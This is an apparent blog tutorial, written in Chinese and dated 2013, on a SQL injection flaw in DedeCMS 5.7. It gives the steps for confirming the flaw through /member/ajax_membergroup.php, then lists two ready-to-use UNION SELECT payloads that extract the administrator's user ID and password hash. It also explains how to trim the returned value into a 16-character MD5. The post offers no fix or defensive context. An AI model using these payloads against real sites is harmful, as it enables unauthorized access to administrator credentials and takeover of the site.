dedecms5.7注入漏洞

时间:2013-12-24 00:36:47 +0800

漏洞判断

首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问

“/member/ajax_membergroup.php?action=post&membergroup=1”页面,

然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面

证明是有漏洞存在的

然后写上语句

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

×

Subscribe

The latest tutorials sent straight to your inbox.